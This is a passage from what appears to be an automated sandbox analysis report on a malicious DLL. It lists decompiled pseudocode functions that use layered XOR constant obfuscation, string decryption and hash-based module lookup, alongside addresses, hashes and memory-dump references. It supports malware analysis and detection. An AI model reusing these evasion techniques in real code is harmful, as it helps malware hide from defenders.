				_t64 =  *0x100010f0; // 0x7d7b62d2
				_t65 = _t64 ^ _t42;
				_v20 = _t42;
				_v16 = _t65;
				_t77 =  !=  ? (_t65 & 0xfffffffc) + 4 : _t65;
				_t48 = E100054FB(_t77);
				_v24 = _t48;
				if(_t48 != 0) {
					_t74 = 0x100010f4;
					_t71 =  <  ? 0 :  &(0x100010f4[_t77 >> 2]) - 0x100010f4 + 3 >> 2;
					if(_t71 != 0) {
						_t80 = _v20;
						_t60 = _t48 - 0x100010f4;
						do {
							_t72 = _t72 + 1;
							 *(_t60 + _t74) =  *_t74 ^ _t80;
							_t34 =  &(_t74[1]); // 0x21a8adb8
							_t74 = _t34;
						} while (_t72 < _t71);
						_t48 = _v24;
					}
					if(_t51 != 0) {
						 *_t51 = _v16;
						return _t48;
					}
				}
				return _t48;
			}

0x1001a96a
0x1001a975
0x1001a976
0x1001a97a
0x1001a97e
0x1001a97f
0x1001a981
0x1001a986
0x1001a987
0x1001a988
0x1001a98d
0x1001a995
0x1001a997
0x1001a9a1
0x1001a9a5
0x1001a9ad
0x1001a9b2
0x1001a9ba
0x1001a9c2
0x1001a9ca
0x1001a9d8
0x1001a9db
0x1001a9df
0x1001a9e7
0x1001a9ec
0x1001a9f2
0x1001a9f4
0x1001a9fa
0x1001aa0b
0x1001aa1b
0x1001aa20
0x1001aa27
0x1001aa2d
0x1001aa47
0x1001aa4c
0x1001aa4e
0x1001aa54
0x1001aa56
0x1001aa5a
0x1001aa5b
0x1001aa5e
0x1001aa5e
0x1001aa61
0x1001aa65
0x1001aa65
0x1001aa6c
0x1001aa72
0x00000000
0x1001aa72
0x1001aa6c
0x1001aa7a

Strings

Fo, xrefs: 1001A9DF

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: Fo
API String ID: 0-989300405
Opcode ID: 9e5462462cae46b98a7698b8efcc1017785fa71cb53adc0e2618408208921356
Instruction ID: 7cb8e7865419a9df740266b001d443ea6ddf3e47797bfc7d0c6a5b6c18104633
Opcode Fuzzy Hash: 9e5462462cae46b98a7698b8efcc1017785fa71cb53adc0e2618408208921356
Instruction Fuzzy Hash: FC31E0B16083809FE754CF69C88185BBBE6EFC8344F80892DF48587215EB75D8468B12

Uniqueness

Uniqueness Score: -1.00%

Function 1001CF31 Relevance: 1.3, Strings: 1, Instructions: 87
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E1001CF31(void* __ecx, void* __edx, void* __eflags) {
				void* _t35;
				signed int _t39;
				unsigned int* _t51;
				signed int _t52;
				signed int _t54;
				signed int _t59;
				unsigned int _t60;
				unsigned int _t61;
				unsigned int* _t65;
				signed int* _t67;
				signed int* _t68;
				signed int* _t69;
				unsigned int _t71;
				void* _t77;
				void* _t79;
				void* _t81;
				void* _t82;

				_t69 =  *(_t81 + 0x2c);
				_push(_t69);
				_push( *((intOrPtr*)(_t81 + 0x30)));
				_push(__edx);
				E10012550(_t35);
				 *((intOrPtr*)(_t81 + 0x28)) = 0x2f20f4;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				 *(_t81 + 0x1c) = 0xdb93;
				_t67 =  &(_t69[1]);
				 *(_t81 + 0x1c) =  *(_t81 + 0x1c) ^ 0xcf590e5f;
				 *(_t81 + 0x1c) =  *(_t81 + 0x1c) ^ 0xcf59d9ad;
				 *(_t81 + 0x40) = 0x4aee;
				 *(_t81 + 0x40) =  *(_t81 + 0x40) >> 0xd;
				 *(_t81 + 0x40) =  *(_t81 + 0x40) >> 0xb;
				 *(_t81 + 0x40) =  *(_t81 + 0x40) ^ 0x00002cea;
				_t54 =  *_t69;
				_t68 =  &(_t67[1]);
				_t39 =  *_t67 ^ _t54;
				 *(_t81 + 0x20) = _t54;
				 *(_t81 + 0x24) = _t39;
				_t20 = _t39 + 1; // 0x1
				_t71 =  !=  ? (_t20 & 0xfffffffc) + 4 : _t20;
				_t82 = _t81 + 0xc;
				_t51 = E100054FB(_t71);
				 *(_t82 + 0x34) = _t51;
				if(_t51 != 0) {
					_t79 = 0;
					_t65 = _t51;
					_t77 =  >  ? 0 :  &(_t68[_t71 >> 2]) - _t68 + 3 >> 2;
					if(_t77 != 0) {
						_t52 =  *(_t82 + 0x14);
						do {
							_t59 =  *_t68;
							_t68 =  &(_t68[1]);
							_t60 = _t59 ^ _t52;
							 *_t65 = _t60;
							_t65 =  &(_t65[1]);
							_t61 = _t60 >> 0x10;
							 *((char*)(_t65 - 3)) = _t60 >> 8;
							 *(_t65 - 2) = _t61;
							_t79 = _t79 + 1;
							 *((char*)(_t65 - 1)) = _t61 >> 8;
						} while (_t79 < _t77);
						_t51 =  *(_t82 + 0x34);
					}
					 *((char*)(_t51 +  *((intOrPtr*)(_t82 + 0x18)))) = 0;
				}
				return _t51;
			}

0x1001cf36
0x1001cf3b
0x1001cf3c
0x1001cf40
0x1001cf42
0x1001cf49
0x1001cf55
0x1001cf56
0x1001cf57
0x1001cf58
0x1001cf60
0x1001cf63
0x1001cf6b
0x1001cf73
0x1001cf7b
0x1001cf80
0x1001cf85
0x1001cf8d
0x1001cf91
0x1001cf94
0x1001cf96
0x1001cf9a
0x1001cf9e
0x1001cfae
0x1001cfb9
0x1001cfc3
0x1001cfc5
0x1001cfcc
0x1001cfd4
0x1001cfd6
0x1001cfe7
0x1001cfec
0x1001cfee
0x1001cff2
0x1001cff2
0x1001cff4
0x1001cff7
0x1001cff9
0x1001d000
0x1001d003
0x1001d006
0x1001d009
0x1001d00f
0x1001d010
0x1001d013
0x1001d017
0x1001d017
0x1001d020
0x1001d020
0x1001d02c

Strings

,, xrefs: 1001CF85

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-48859977
Opcode ID: 5ce2485613cba5a6437e7217406bc29238c0f0aad0300714a2d7ecf3c9a30912
Instruction ID: d07b5d7a3119913d9e5bfc87cc33959e6ab1257790bf76063096ffdf1fc679ba
Opcode Fuzzy Hash: 5ce2485613cba5a6437e7217406bc29238c0f0aad0300714a2d7ecf3c9a30912
Instruction Fuzzy Hash: A831A932A097518FD315DF2CC88555BFBE0EF99704F024A6DEA89A7301C771E90ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 10010223 Relevance: 1.3, Strings: 1, Instructions: 68
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10010223(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t69;
				signed int _t73;
				intOrPtr* _t79;
				intOrPtr* _t80;
				void* _t81;

				_v32 = _v32 & 0x00000000;
				_v40 = 0x1d1d13;
				_v36 = 0x222c2b;
				_v20 = 0x8e6b;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x0011cb3d;
				_v16 = 0xc711;
				_v16 = _v16 >> 0xa;
				_t73 = 0xe;
				_v16 = _v16 * 0x46;
				_v16 = _v16 ^ 0x000025d9;
				_v12 = 0x5a6f;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 << 0x10;
				_v12 = _v12 * 0x7c;
				_v12 = _v12 ^ 0x007c57cb;
				_v24 = 0xc850;
				_v24 = _v24 | 0x7c4bf75d;
				_v24 = _v24 ^ 0x7c4b9b6b;
				_v28 = 0x7391;
				_v28 = _v28 + 0x5592;
				_v28 = _v28 ^ 0x0000ce0e;
				_v8 = 0x1617;
				_v8 = _v8 / _t73;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 * 0x60;
				_v8 = _v8 ^ 0x00003b9a;
				_t79 =  *((intOrPtr*)(E10003278() + 0xc)) + 0xc;
				_t80 =  *_t79;
				while(_t80 != _t79) {
					_t58 = _t80 + 0x30; // 0xfef84d81
					_t69 = E1000165C( *_t58, _v12, _v24, _v28, _v8);
					_t81 = _t81 + 0xc;
					if((_t69 ^ 0x1f8fefc1) == _a4) {
						_t60 = _t80 + 0x18; // 0xe845c718
						return  *_t60;
					}
					_t80 =  *_t80;
				}
				return 0;
			}

0x10010229
0x1001022f
0x10010236
0x1001023d
0x10010244
0x10010247
0x1001024b
0x10010252
0x10010259
0x10010265
0x10010266
0x10010269
0x10010270
0x10010277
0x1001027b
0x10010283
0x10010286
0x1001028d
0x10010294
0x1001029b
0x100102a2
0x100102a9
0x100102b0
0x100102b7
0x100102c3
0x100102c6
0x100102ce
0x100102d1
0x100102e6
0x100102e9
0x10010310
0x100102f9
0x100102fc
0x10010306
0x1001030c
0x1001031c
0x00000000
0x1001031c
0x1001030e
0x1001030e
0x00000000

Strings

+,", xrefs: 10010236

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: +,"
API String ID: 0-654858841
Opcode ID: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
Instruction ID: 694904852d72765b963f89042d5d7f3bbc82b228f780878715ed2fa4c107c001
Opcode Fuzzy Hash: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
Instruction Fuzzy Hash: 60314271D0060DEBDB04CFA5C98A99EFBB0FB44354F208599D415BB250D3B4AB88DF84

Uniqueness

Uniqueness Score: -1.00%

Function 100109B8 Relevance: 1.3, Strings: 1, Instructions: 59
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E100109B8(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t54;
				signed int _t62;
				signed int _t63;

				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t54 = E10012550(0);
				_v28 = _t54;
				_v24 = _t54;
				_v32 = 0x34e779;
				_v20 = 0xed53;
				_v20 = _v20 >> 2;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x000ef232;
				_v16 = 0x8c43;
				_t62 = 0x6e;
				_v16 = _v16 * 0x16;
				_t63 = 0x43;
				_v16 = _v16 / _t62;
				_v16 = _v16 | 0xa5153760;
				_v16 = _v16 ^ 0xa5150d1d;
				_v12 = 0x71b1;
				_v12 = _v12 | 0x28689702;
				_v12 = _v12 ^ 0x24ff525f;
				_v12 = _v12 ^ 0x99266ed7;
				_v12 = _v12 ^ 0x95b1ff33;
				_v8 = 0x9915;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 / _t63;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x0000698b;
				return E1001E232(_v20, _v16, __edx, _a12, _v12, _t63, _v8);
			}

0x100109bf
0x100109c6
0x100109c9
0x100109ca
0x100109cb
0x100109cc
0x100109d1
0x100109d7
0x100109dc
0x100109e3
0x100109ea
0x100109ee
0x100109f2
0x100109f9
0x10010a06
0x10010a09
0x10010a11
0x10010a12
0x10010a17
0x10010a1e
0x10010a25
0x10010a2c
0x10010a33
0x10010a3a
0x10010a41
0x10010a48
0x10010a4f
0x10010a58
0x10010a5b
0x10010a5f
0x10010a83

Strings

y4, xrefs: 100109DC

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: y4
API String ID: 0-35764640
Opcode ID: 85987d0af05f291c1bba09fd4deff99604705c1734ec6e85378ee402cbfd5748
Instruction ID: 908cc5c5e270103f339a6ef1588df2ba713e9f0070c63ca1c554a9cc977a49ba
Opcode Fuzzy Hash: 85987d0af05f291c1bba09fd4deff99604705c1734ec6e85378ee402cbfd5748
Instruction Fuzzy Hash: 1E2140B5C0120DEBDB08CFE9C80A8AEBBB1FB44300F108099E425A7260D3B95B50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000E612 Relevance: .2, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1000E612() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _t219;
				short _t230;
				short _t232;
				void* _t237;
				void* _t238;
				void* _t258;
				short* _t259;
				void* _t260;
				short* _t261;
				short* _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				void* _t270;

				_v96 = _v96 & 0x00000000;
				_v108 = 0x4935a9;
				_t238 = 0x2385cbc3;
				_v104 = 0x1767a9;
				_v100 = 0x71ae0c;
				_v20 = 0x2668;
				_t258 =  *0x10021088 + 0x38;
				_v20 = _v20 | 0x7ba2ed9b;
				_v20 = _v20 + 0xffff3c7d;
				_v20 = _v20 + 0xffff231c;
				_v20 = _v20 ^ 0x7ba17e9e;
				_v56 = 0xe8af;
				_v56 = _v56 + 0xfa0e;
				_v56 = _v56 ^ 0x9e111eab;
				_v56 = _v56 ^ 0x9e10e373;
				_v24 = 0x871c;
				_v24 = _v24 << 0xf;
				_v24 = _v24 >> 4;
				_v24 = _v24 + 0xffffba2c;
				_v24 = _v24 ^ 0x0438e224;
				_v60 = 0x90d6;
				_v60 = _v60 | 0xb72a7a32;
				_v60 = _v60 + 0xffff6a8c;
				_v60 = _v60 ^ 0xb72a6d3a;
				_v84 = 0xc38;
				_v84 = _v84 | 0xf14ca8d2;
				_v84 = _v84 ^ 0xf14c81a8;
				_v80 = 0x2669;
				_t263 = 0x64;
				_v80 = _v80 / _t263;
				_v80 = _v80 ^ 0x0000244e;
				_v76 = 0xca1e;
				_t264 = 0x22;
				_v76 = _v76 / _t264;
				_v76 = _v76 ^ 0x000038d6;
				_v68 = 0x7bb5;
				_v68 = _v68 | 0x2bfa8cc8;
				_v68 = _v68 + 0xffff7471;
				_v68 = _v68 ^ 0x2bfa6fbb;
				_v32 = 0xfcd5;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x2150d801;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x000853df;
				_v28 = 0xef37;
				_v28 = _v28 ^ 0x5be54c03;
				_v28 = _v28 | 0x52b36e66;
				_v28 = _v28 + 0x9a0c;
				_v28 = _v28 ^ 0x5bf8fb3a;
				_v64 = 0xdcca;
				_v64 = _v64 + 0xd7f5;
				_v64 = _v64 >> 8;
				_v64 = _v64 ^ 0x000070b2;
				_v72 = 0xbeda;
				_t265 = 0x5d;
				_v72 = _v72 * 0x2c;
				_v72 = _v72 ^ 0x0020a7ce;
				_v8 = 0xad8b;
				_v8 = _v8 ^ 0x0a8bb6d2;
				_v8 = _v8 * 0x1a;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x0c70cf11;
				_v16 = 0xcb7;
				_v16 = _v16 / _t265;
				_t266 = 0x25;
				_push("true");
				_v16 = _v16 / _t266;
				_v16 = _v16 + 0xffff7a88;
				_v16 = _v16 ^ 0xffff53c8;
				_v52 = 0x513d;
				_v52 = _v52 | 0x7fbc6d9f;
				_v52 = _v52 ^ 0x7fbc6fd5;
				_v12 = 0xd2d6;
				_v12 = _v12 + 0xec15;
				_v12 = _v12 | 0xf7fef9de;
				_v12 = _v12 ^ 0xf7ffcc6d;
				_v48 = 0x3b6f;
				_v48 = _v48 + 0xffff5d9c;
				_v48 = _v48 + 0xffff2e60;
				_v48 = _v48 ^ 0xfffe9d66;
				_v44 = 0xd292;
				_v44 = _v44 + 0x28de;
				_t219 = _v44;
				_pop(_t267);
				_t252 = _t219 % _t267;
				_v44 = _t219 / _t267;
				_t237 = 2;
				_v44 = _v44 * 0x6d;
				_v44 = _v44 ^ 0x000550f8;
				_v40 = 0x4184;
				_v40 = _v40 * 0x2c;
				_v40 = _v40 + 0xa5cf;
				_v40 = _v40 << 0xa;
				_v40 = _v40 ^ 0x2fa1cfd8;
				_v88 = 0x2b12;
				_v88 = _v88 + 0xffff5308;
				_v88 = _v88 ^ 0xffff15a9;
				_v36 = 0x98e2;
				_v36 = _v36 >> 2;
				_v36 = _v36 + 0xffffa9a0;
				_v36 = _v36 | 0xdd3f0fc1;
				_v36 = _v36 ^ 0xffff9d62;
				do {
					while(_t238 != 0x135586c5) {
						if(_t238 == 0x1d3b4bfc) {
							_t268 = E1000DF8A(_t238, _t252, __eflags, 0x10, 4);
							E10019A27( &_v92, _t237, _v60, 1, _t258, _v84, _v80, _v76);
							_t260 = _t258 + _t237;
							_t252 = 1;
							E10019A27( &_v92, 1, _v68, _t268, _t260, _v32, _v28, _v64);
							_t270 = _t270 + 0x38;
							_t261 = _t260 + _t268 * 2;
							_t238 = 0x35eda080;
							_t230 = 0x5c;
							 *_t261 = _t230;
							_t258 = _t261 + _t237;
							continue;
						} else {
							if(_t238 == 0x2385cbc3) {
								_t232 = E1000A156();
								_v92 = _t232;
								_t238 = 0x1d3b4bfc;
								continue;
							} else {
								_t275 = _t238 - 0x35eda080;
								if(_t238 == 0x35eda080) {
									_t269 = E1000DF8A(_t238, _t252, _t275, 0x10, 4);
									_t252 = 1;
									E10019A27( &_v92, 1, _v16, _t269, _t258, _v52, _v12, _v48);
									_t270 = _t270 + 0x20;
									_t262 = _t258 + _t269 * 2;
									_t238 = 0x135586c5;
									_t232 = 0x2e;
									 *_t262 = _t232;
									_t258 = _t262 + _t237;
									continue;
								}
							}
						}
						goto L9;
					}
					_t252 = 1;
					E10019A27( &_v92, 1, _v44, 3, _t258, _v40, _v88, _v36);
					_t259 = _t258 + 6;
					_t270 = _t270 + 0x18;
					_t238 = 0x18dc1a34;
					 *_t259 = 0;
					_t258 = _t259 + _t237;
					__eflags = _t258;
					L9:
					__eflags = _t238 - 0x18dc1a34;
				} while (__eflags != 0);
				return _t232;
			}

0x1000e618
0x1000e61e
0x1000e625
0x1000e62a
0x1000e631
0x1000e641
0x1000e648
0x1000e64b
0x1000e652
0x1000e659
0x1000e660
0x1000e667
0x1000e66e
0x1000e675
0x1000e67c
0x1000e683
0x1000e68a
0x1000e68e
0x1000e692
0x1000e699
0x1000e6a0
0x1000e6a7
0x1000e6ae
0x1000e6b5
0x1000e6bc
0x1000e6c3
0x1000e6ca
0x1000e6d1
0x1000e6dd
0x1000e6e2
0x1000e6e7
0x1000e6ee
0x1000e6f8
0x1000e6fd
0x1000e702
0x1000e709
0x1000e710
0x1000e717
0x1000e71e
0x1000e725
0x1000e72c
0x1000e730
0x1000e737
0x1000e73b
0x1000e742
0x1000e749
0x1000e750
0x1000e757
0x1000e75e
0x1000e765
0x1000e76c
0x1000e773
0x1000e777
0x1000e77e
0x1000e789
0x1000e78a
0x1000e78d
0x1000e794
0x1000e79b
0x1000e7a6
0x1000e7a9
0x1000e7ad
0x1000e7b4
0x1000e7c0
0x1000e7ca
0x1000e7cd
0x1000e7cf
0x1000e7d4
0x1000e7db
0x1000e7e2
0x1000e7e9
0x1000e7f0
0x1000e7f7
0x1000e7fe
0x1000e805
0x1000e80c
0x1000e813
0x1000e81a
0x1000e821
0x1000e828
0x1000e82f
0x1000e836
0x1000e83d
0x1000e840
0x1000e841
0x1000e845
0x1000e84c
0x1000e84d
0x1000e850
0x1000e857
0x1000e862
0x1000e865
0x1000e86c
0x1000e870
0x1000e877
0x1000e87e
0x1000e885
0x1000e88c
0x1000e893
0x1000e897
0x1000e89e
0x1000e8a5
0x1000e8ac
0x1000e8ac
0x1000e8be
0x1000e93f
0x1000e94a
0x1000e952
0x1000e95f
0x1000e965
0x1000e96a
0x1000e96d
0x1000e970
0x1000e977
0x1000e978
0x1000e97b
0x00000000
0x1000e8c0
0x1000e8c6
0x1000e916
0x1000e91b
0x1000e91e
0x00000000
0x1000e8c8
0x1000e8c8
0x1000e8ce
0x1000e8e6
0x1000e8f3
0x1000e8f9
0x1000e8fe
0x1000e901
0x1000e904
0x1000e90b
0x1000e90c
0x1000e90f
0x00000000
0x1000e90f
0x1000e8ce
0x1000e8c6
0x00000000
0x1000e8be
0x1000e98d
0x1000e997
0x1000e99c
0x1000e9a1
0x1000e9a4
0x1000e9a9
0x1000e9ac
0x1000e9ac
0x1000e9ae
0x1000e9ae
0x1000e9ae
0x1000e9c0

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa4949545701073c0452a974a92e1707d2150ce4ae3387db057db6a61aabe181
Instruction ID: 83a9038e28db66a5d1e85fe0ee5bce0886ce6626417273f62217079ec9447d84
Opcode Fuzzy Hash: aa4949545701073c0452a974a92e1707d2150ce4ae3387db057db6a61aabe181
Instruction Fuzzy Hash: 8AB14272D00319EBEB24CFE5D88A9DEBBB1FF44314F248159E101BA2A4D7B81A46CF55

Uniqueness

Uniqueness Score: -1.00%

Function 1001CBE7 Relevance: .2, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E1001CBE7(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				short _v108;
				char* _v112;
				char* _v116;
				signed int _v120;
				char _v124;
				char _v644;
				char _v1164;
				void* _t219;
				signed int _t250;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t284;
				void* _t286;

				_push(_a12);
				_t286 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t219);
				_v72 = 0xff63;
				_t254 = 0x3f;
				_v72 = _v72 / _t254;
				_v72 = _v72 ^ 0x0000040c;
				_v44 = 0x91a7;
				_v44 = _v44 + 0x72f0;
				_v44 = _v44 + 0xffff06b2;
				_v44 = _v44 ^ 0x7ebd7edf;
				_v44 = _v44 ^ 0x7ebd7382;
				_v80 = 0x7372;
				_v80 = _v80 + 0x2298;
				_v80 = _v80 ^ 0x00009e0a;
				_v32 = 0xf77b;
				_v32 = _v32 + 0xffff7d6a;
				_v32 = _v32 << 2;
				_v32 = _v32 + 0x362;
				_v32 = _v32 ^ 0x0001db13;
				_v16 = 0x136c;
				_v16 = _v16 + 0x48d8;
				_v16 = _v16 ^ 0xac4e468e;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 ^ 0x002b0548;
				_v40 = 0x3373;
				_v40 = _v40 + 0xffffe1ff;
				_v40 = _v40 + 0xffff2492;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 ^ 0x003fb2a7;
				_v56 = 0x21f6;
				_t255 = 0x1f;
				_v56 = _v56 * 0x2b;
				_v56 = _v56 / _t255;
				_v56 = _v56 ^ 0x00002778;
				_v68 = 0x53f7;
				_v68 = _v68 ^ 0xc2013ade;
				_v68 = _v68 ^ 0xc201165c;
				_v88 = 0x904;
				_v88 = _v88 + 0xffff70ae;
				_v88 = _v88 ^ 0xffff0cbd;
				_v12 = 0x6bbb;
				_t256 = 0x5d;
				_t284 = 0x1e;
				_v12 = _v12 * 0x56;
				_v12 = _v12 + 0x87c0;
				_v12 = _v12 + 0xffff5e93;
				_v12 = _v12 ^ 0x002412a1;
				_v8 = 0x6b19;
				_v8 = _v8 / _t256;
				_v8 = _v8 >> 1;
				_v8 = _v8 / _t284;
				_v8 = _v8 ^ 0x00002578;
				_v24 = 0x1b3a;
				_v24 = _v24 + 0x4480;
				_v24 = _v24 + 0xffff3a7d;
				_v24 = _v24 + 0xffff7f01;
				_v24 = _v24 ^ 0xffff7fa1;
				_v28 = 0x593f;
				_v28 = _v28 >> 7;
				_v28 = _v28 ^ 0x30479afe;
				_v28 = _v28 | 0x2165af19;
				_v28 = _v28 ^ 0x3167a871;
				_v76 = 0x861a;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x00001e41;
				_v20 = 0xbc3c;
				_v20 = _v20 + 0xffff2788;
				_v20 = _v20 >> 6;
				_v20 = _v20 + 0xffff65b3;
				_v20 = _v20 ^ 0x03ff130c;
				_v92 = 0x12c7;
				_v92 = _v92 + 0xffff7146;
				_v92 = _v92 ^ 0xffff9baa;
				_v36 = 0xedf2;
				_v36 = _v36 << 3;
				_t257 = 0xc;
				_v36 = _v36 * 0xa;
				_v36 = _v36 ^ 0x56c2f471;
				_v36 = _v36 ^ 0x5688d77c;
				_v64 = 0x6a0;
				_v64 = _v64 * 0x5b;
				_v64 = _v64 ^ 0x0002624d;
				_v84 = 0xe931;
				_v84 = _v84 * 0x43;
				_v84 = _v84 ^ 0x003d25b3;
				_v60 = 0xc012;
				_t258 = 0x27;
				_v60 = _v60 / _t257;
				_v60 = _v60 ^ 0x00000568;
				_v48 = 0xfc11;
				_v48 = _v48 | 0xf924173d;
				_v48 = _v48 / _t258;
				_v48 = _v48 ^ 0x06636dad;
				_v52 = 0xa67a;
				_v52 = _v52 ^ 0x536712b1;
				_v52 = _v52 << 2;
				_v52 = _v52 ^ 0x4d9efdac;
				E10005755(_v32,  &_v124, _v16, _v40, _t284);
				E10005755(_v56,  &_v644, _v68, _v88, 0x208);
				E10005755(_v12,  &_v1164, _v8, _v24, 0x208);
				E100103F1(_v28, _v76, _t286,  &_v644, _v20, _v92);
				E100103F1(_v36, _v64, _a12,  &_v1164, _v84, _v60);
				_v120 = _v72;
				_v116 =  &_v644;
				_v112 =  &_v1164;
				_v108 = _v80 | _v44;
				_t250 = E1000E554(_v48,  &_v124, _v52);
				asm("sbb eax, eax");
				return  ~_t250 + 1;
			}

0x1001cbf2
0x1001cbf5
0x1001cbf7
0x1001cbfa
0x1001cbfd
0x1001cbfe
0x1001cbff
0x1001cc04
0x1001cc12
0x1001cc17
0x1001cc1c
0x1001cc23
0x1001cc2a
0x1001cc31
0x1001cc38
0x1001cc3f
0x1001cc46
0x1001cc4d
0x1001cc54
0x1001cc5b
0x1001cc62
0x1001cc69
0x1001cc6d
0x1001cc74
0x1001cc7b
0x1001cc82
0x1001cc89
0x1001cc90
0x1001cc94
0x1001cc9b
0x1001cca2
0x1001cca9
0x1001ccb0
0x1001ccb4
0x1001ccbb
0x1001ccc6
0x1001ccc9
0x1001ccd3
0x1001ccd6
0x1001ccdd
0x1001cce4
0x1001cceb
0x1001ccf2
0x1001ccf9
0x1001cd00
0x1001cd07
0x1001cd12
0x1001cd15
0x1001cd16
0x1001cd19
0x1001cd20
0x1001cd27
0x1001cd2e
0x1001cd3c
0x1001cd3f
0x1001cd47
0x1001cd4a
0x1001cd51
0x1001cd58
0x1001cd5f
0x1001cd66
0x1001cd6d
0x1001cd76
0x1001cd7d
0x1001cd81
0x1001cd88
0x1001cd8f
0x1001cd96
0x1001cd9d
0x1001cda1
0x1001cda8
0x1001cdaf
0x1001cdb6
0x1001cdba
0x1001cdc1
0x1001cdc8
0x1001cdcf
0x1001cdd6
0x1001cddd
0x1001cde4
0x1001cdee
0x1001cdf1
0x1001cdf4
0x1001cdfb
0x1001ce02
0x1001ce0d
0x1001ce10
0x1001ce17
0x1001ce22
0x1001ce25
0x1001ce2c
0x1001ce38
0x1001ce39
0x1001ce3e
0x1001ce45
0x1001ce4c
0x1001ce59
0x1001ce5f
0x1001ce66
0x1001ce6d
0x1001ce74
0x1001ce78
0x1001ce88
0x1001cea2
0x1001ceb7
0x1001ced0
0x1001ceee
0x1001cef9
0x1001cf02
0x1001cf0b
0x1001cf1a
0x1001cf1e
0x1001cf28
0x1001cf30

Memory Dump Source

